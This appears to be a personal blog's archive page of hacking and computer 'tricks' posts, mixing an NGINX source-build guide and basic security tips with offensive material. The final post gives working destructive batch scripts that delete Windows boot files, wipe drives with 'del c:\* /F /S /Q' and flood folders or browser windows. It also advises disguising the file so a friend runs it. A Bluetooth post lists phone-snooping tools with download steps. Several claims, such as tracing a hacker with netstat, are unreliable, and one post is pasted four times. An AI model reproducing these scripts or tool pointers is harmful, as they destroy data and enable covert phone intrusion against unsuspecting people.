Search This Blog

Pages

Header Ads Widget

Responsive Advertisement
Showing posts with label how to. Show all posts
Showing posts with label how to. Show all posts

Sunday, 4 October 2020

How to Install NGINX(Compiled From Source Code) in Ubuntu

 Todays post is about how to install by direct compiling NGINX in ubuntu.

There are two ways two install nginx:-

1. Install pre-built version of nginx. For this you can check nginx docs there are some very simple steps for this step. 

2. Install nginx by download it source and then compile it by yourself.


Why we need to install nginx by  2 step??

In a pre-built version of nginx there are some default modules(you can say some default functionality), but if you need some extra functionality of nginx that is not in pre-built version, then you have to compile it yourself. Because nginx does not support adding module after installation, so every time if you need some new module you have to compile it again. BTW later version of nginx supports adding third party modules after installation. But here we require extra module of nginx not third party thats why we are installing it again. So lets start.

Before installing if you already have nginx install in your system them remove it and also take snapshot of a system because we are going to change lots of config.

sudo apt-get purge nginx nginx-common

STEP - 1;

Here are some basic commands before starting

sudo apt-get update
sudo apt-get upgrade
sudo apt-get install build-essential

STEP - 2;

Now install some support libraries that is essential for nginx to run like pcre(for rewrite functionality), openssl(for https), zlib(for compression).

 1. PCRE

sudo apt-get install libpcre3
sudo apt-get install libpcre3-dev

2. OPENSSL

sudo apt-get install openssl

3. ZLIB

sudo apt-get install zlib1g zlib1g-dev

STEP - 3;

Now download source code of nginx current stable version is 1.18 but you can change according to time.

wget https://nginx.org/download/nginx-1.18.0.tar.gz
tar xzf nginx-1.18.0.tar.gz
cd nginx-1.18.0.tar.gz/

STEP - 4;

After downloading the source code now comes the fun part we have to configure it and tell nginx which modules we are going to need.

Example script that i copy paste from nginx docs. Dont worry if you did not understand it actually i also not understand it completely just joking. So as you can see you have to provide all custom setting in /configure command so that nginx can build according to our taste. If you have to understand details of this command you can comment i will write a post about it.

./configure
--sbin-path=/usr/local/nginx/nginx
--conf-path=/usr/local/nginx/nginx.conf
--pid-path=/usr/local/nginx/nginx.pid
--with-pcre=../pcre-8.44
--with-zlib=../zlib-1.2.11
--with-http_ssl_module
--with-stream
--with-mail=dynamic
--add-module=/usr/build/nginx-rtmp-module
--add-dynamic-module=/usr/build/3party_module 

Now as you can see to add module you can use --with-{module_name} and to remove any default module you can use --without-{module_name}. For all module name refer to nginx docs. Here is a command that i use because i want secure_link module, secure link module is use to secure your link like expire time, or bound with ip basicaaly used when you serve protected content to user.

Remember all this command is one line 

./configure --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --modules-path=/usr/lib/nginx/modules --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --with-http_ssl_module --with-http_realip_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-http_degradation_module

Now you have to run some last commands.

make
sudo make install

 

Done nginx is installed in your system.

Now simply run:-

 sudo nginx
 to start the nginx


NOTE:-

I know while you perform all these some of you got stuck at any step so don't panic comment me the error trace and i will help you out. Because i cannot cover all the error cases in this post.

 


Thursday, 24 August 2017

HACKING WINDOWS 1.0


Whatsup guys ? Here a good news ............

WINDOWS HACKED 1.0 is our new program which i started for you guys soon. 

 

Are you guys readyyyyyyyyyy....................

Leave your mail in comment box to get the complete details .

#education #hacking, #windowshacking, #security, #window7, # how to, #hacking course, #beginners

Monday, 21 August 2017

How to check if someone is using fake profile picture

 [FAKE PROFILE BUSTED]😎😎😎😎😎
Hello guys, Today I'm going to tell you how to find out if someone is using fake profile picture.  There is online website named as TinEye, By using this website website we will easily able to know how many people using this profile picture and where.

About TinEye..........
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
TinEye is a reverse image search engine. It finds out where an image came from, how it is being used, if modified versions of the image exist, or if there is a higher resolution version.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Just Follow these easy steps:
1. First of all visit TinEye.
2. Upload that that profile picture or simply paste the URL of that picture.
3. Now press search and it will show you  results and now you can easily check that from where this image is come from and how it being used.

Enjoy &Keep Visiting...
.And if u want more tricks follow me...

Friday, 18 August 2017

Prevent from phising

Hey Guys,
This time i am gonna tell you about those features to prevent from #phising
Phising = Fraud Fraud Fraud
 Don't trust on these types of things
....................................................................................
  • Do not response to unwanted emails  
  •  Use internet security 
  • Use antivirus protection 
  •  Never write your persornal informal on pop-up screen
  • Always check your bank accounts time to time regularly
.....................................................................................
  Hope guys it will helpful for you

#like #share #thanku

Sunday, 24 August 2014

Some More cmd tricks

Command Prompt is the one of most powerful tools for the  Windows so in easy word it’s a GUI based operating system .most of the people ignore that but  with the help of command prompt you can do many think like hacking .so here are some most used full command’s .
Open your command prompt  then Go window then search simple cmd

 1.Watch THE ASCII version of a Star Wars movie



so for all who are big fan of star wars movie, so then it’s simple trick just enter in the command prompt then just type telnet towel.blinkenlights.nl.

2. Know your IP add, DNS Server add and a lot more

  
with the help of Command Prompt you can easily fine the IP ,DNS server , host name , node type IP routing and wins proxy just type the ipconfig /all

3. Know that if the any neighbors are using your Wi-Fi connection

You can find with the help of command prompt that someone using your internet follow these step
Command Prompt can let you know if someone is connected to your Local Area Connection and then using it. Just follow the steps. 

1) Open the browser and visit a http://192.168.18.1 or its depending on your router ip. 


2) Then Find a tabs that are mentions with the “Attached Device” or  like similar.


3) Now you can find the IP address,the computer name, and the MAC add 


4 ) now finally you can Compare it with those displayed by router in Step 2.then If you are notice that someone strange devices so  then you’re neighbor has been using your internet .so then in this case change your setting like password

4. If hacker is hacking your computer so the Trace the Hacker


If you are interested to find that hacker so then using the command prompt you can find the hacker so then just execute netstat –a so then it will show the computer name that was connected with your computer . so now you can find the person easily.

5. Use Abort a Command


If you any command can be stopped so then just enter ctrl + C then you can change you line easily.

6. Hack the Prompt Text.


if you interested to hack the command prompt title so then its easily hacked
just enter the prompt like this prompt hacked by Noman Ramzan



7. Some Function From the Command Prompt


So this is just function from the command prompt like just go in the command prompt and then left click on that then you can see that there are some function like Mark, copy, select, paste and find so with the help of this function you can copy, select, mark and paste easily

8. Get help for the command prompt

Well let’s say you don’t know about the some command of this so then you can take simply you enter the cd/? For help so then work easily

10. Chat with your Friends with Command Prompt 


Hello my reader now you can chat with your friends easily with this simple trick . so then you just need you friend IP and your command prompt
1.     Open the office word or notepad  and paste this code
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

      2.     Now save this file with the “messenger.bat” then open your command prompt.
      3.     Drag the file (.bat file) over to the CP and then press enter.
      4.     So then CP show you the messenger and user
      5.     So in the user field you just enter your friend IP
      6.     So after that just enter you message want to send your friend

So this is a simple trick to chat with the command prompt so start chatting with him or her 

There are also lots of commands of the CP so i will try to define in my next article.
Thanks for the reading if you have any problem so then you can ask me .

How to check|Stop that Your computer HACKED or NOT

 The Computer hackers can the cause serious damage to most of computer and may be your personal information. 

Hacking can mean the number of things but the computer hacking is a basically when someone accesses into your computer or may be its resources. Without your permission and then initially may be without your knowledge. Computers can be the hacked without leaving any evidence behind that. As the home user and you can always find out that if you have been hacked by the black hat hackers because the black hat hacker either wants keep using your personal computer resources or may be want to harm the computer. As the black hat can try to access your computer.


So as I am security Researcher it’s my duty to stop the black hat hacker from the unethical work and also inform to the people about the all activity of those person. So here is simple trick that how you can check your computer that may hacked by hackers. So let’s start follows the some step .then you can easily check your computer is hacked or not. The lots of technique to stop the black hat hacker. So for my reader I am sharing simple technique so let’s start.
Technique # 01
Look for the extra folder like right click on the hard drive and check that how much your hard drive is used. If your computer is compromised by hacker  so the will see your memory lost mean that your pc may be being used to the file sharing .so now check your folder then you will see the some folder with the large memory.
Technique # 02
Check the user. Just Go to the Control Panel and then click on the "Users." So if may be any extra users have been added so may be your computer is hacked or if the some user password changed and then it’s confirm that your computer was hacked.


Technique # 03
Find out that if your security has been off .so check this Go to the Control Panel then look to see if the firewall turned off sometime or always and your ant virus is on and may be window update off so then your computer is hacked.
Technique # 04
Finally in last try to runs your antivirus and other software like remove to spyware. If your computer is hacked so it show the lot of spyware

HOW TO STOP HACKER’S

So finally some technique that how to stop the hacker’s from this activity .
STEP # 01
Open your command prompt the type netstat –b so its simple show you that some IP address associated with the all program engaged with the internet then The list will be update every five seconds and then simple giving you the real-time look IP addresses your computer is the sending information to and then Look for the IP addresses or may be program names that you cannot identify. So take the screen shot. And save it in your computer.
STEP # 02
Then you can Type tracert like "tracert" like below its give you all the information about the IP address like name and internet service provider .
STEP # 03
So finally Shut down the computer. And then Contact the ISP company and give the IP address and and alert your all the problem.so then may take action.

if you like then comment below.

How to hack via bluetooth

Today i am sharing very interesting trick that how to hack Bluetooth hacking software well you all are familiar with a term of hacking and now a days the people who are unaware of hacking losses their important data, credit card numbers and lots of other thing which are valueable.Well today I am sharing an interesting piece of hacking.People are amazed when they see hacker access a mobile phone with the Bluetooth and multimedia phones .But let me tell you its very simple.There are various hacks and lot ofsoftware already available on the different website which helps hackers to hack any cell phone and multimedia phones.In this post that I have outlined only Some Bluetooth Hacking Software and because these softwares are very effective to access any phone.

 And now here comes some of the softwares list of Bluetooth hacking software. 

1) Super Bluetooth Hack (awesome software)


This software is used for the reading information’s and controlling from remote cell phone via Bluetooth or infra .The Phone list and SMS can be stored in the HTML type. In addition to it that will display information about the battery, Sim card and network’s if you download the software  (Super Bluetooth Hack)  simply download it and use it.it is quite easy to use or if you want to install directly to your cell phone than follow the procedure below.

Download Super Bluetooth Hack 1.08 to Your Phone

1.Go to m.brothersoft.com on any browers of your phone
2.Enter Quick Download Page which links at the bottom of the page
3.Enter Code: 127249 to begin download

And more detail about the software so Detail about bluetooth hacking

 2) blue scanner


 The Blue Scanner searches out for the Bluetooth enabled a devices and then try to extract as the much information as possible for a each newly discovered device. Download this software so blue scanner download


 3) Blue Bugger


 This is simply exploits the Blue Bug (and name of the set of Bluetooth security holes) vulnerability of a Bluetooth enabled devices and then By exploiting these vulnerabilities hacker can access on the calls lists, phone-book and more information of that cell phone. Download Blue Bugger download

 4) BTbrowser


 This software BT Browser is the J2ME application which can the browse and explore the very good information about the technical specification of surrounding Bluetooth enabled devices and the hacker can browse device information so then all supported profiles, services records of the each device.
For download BTbrowser Download

5) BTCrawler

 The BT Crawler is the scanner for a window Mobile Based device and it scans for the other devices in a range and then performs service a query then finally it implement BlueSnarfing.
For download BTCrawler Download



CONCLUSION:

I have outlined these Bluetooth software that mostly use by the hacker to access into  cell phone. So my suggestion for all the Reader kindly switched off your Bluetooth if you don’t need of this it will save your battery and your data as well.

IMPORTANT note:

It’s just for the educational purpose. Try to use it by your risk
Please leave your valuable comment below about the Article.


Share if you Like it

Friday, 22 August 2014

Change your IP address


 how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


    Click on "Start" in the bottom left corner of the screen.
    Click on "RUN"
    Type in "command" and click OK


      You should be now at MSDOS prompt Screen

    Type "ipconfig /release" just like that, and press "enter"
    Type "exit" and leave the prompt
    Right-click on "Network Places" or "My Network Places" on your desktop.
    Click on "properties"


     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

     Right click on "Local Area Connection" and click "properties"
    Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
    Click on "Use the following IP address" under the "General" tab
    Create an IP address (It doesn't matter what it is)
    Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
    Press the "Ok" button here
    Hit the "Ok" button again


     Now you should be back to the "Local Area Connection" screen.

    Right-click back on "Local Area Connection" and go to properties again.
    Go back to the "TCP/IP" settings
    This time, select "Obtain an IP address automatically"
    Click on "Ok"
    Hit "Ok" again.
    Now you have a New IP address.

 how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.
- See more at: http://www.besthacking.in/2014/03/change-your-ip-in-less-then-1-minute.html#sthash.O7LGvuxh.dpuf
 how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.
- See more at: http://www.besthacking.in/2014/03/change-your-ip-in-less-then-1-minute.html#sthash.O7LGvuxh.dpuf
 how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.
- See more at: http://www.besthacking.in/2014/03/change-your-ip-in-less-then-1-minute.html#sthash.O7LGvuxh.dpuf
 how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.
- See more at: http://www.besthacking.in/2014/03/change-your-ip-in-less-then-1-minute.html#sthash.O7LGvuxh.dpuf

Thursday, 21 August 2014

Top 5 most dangerous notepad virus...(TRY AT QWN RISK)

SOME DANGEROUS AND DEADLY  TRICKS
[CAUTION]
  DO NOT TRY THESE FOR FUN!!
1. How to create more than 3,000 folders under a minute
1) Open your notepad and type
the following code.
@echo off
:top
md %random%

goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.
 ———————————————————————————
——————————————————–


2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.

———————————————————————————
——————————————————–
3. How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5mins.
———————————————————————————
——————————————————–
4. RAM crashing trick
open notepad and type
:A
start http://computer-tricks-corner.blogspot.in/
goto A
save with .bat extension.
Infinitely loops your browser to
open up http://computer-tricks-corner.blogspot.in/
———————————————————————————
——————————————————–
5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it
will hang/crash your system. It
basically floods you with an
infinite loop of mailto:xxx
windows. To cancel this (and you
have to move fast) kill the
process of your email client
before you run out of RAM. Every
instance occupies about 1000
bytes, if your victim is smart, he
better end the process As soon as
possible or he will be forced to
reboot his computer.
WARNING THIS LINK WILL CRASH
YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!!
Click Here
———————————————————————————
——————————————————–
NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!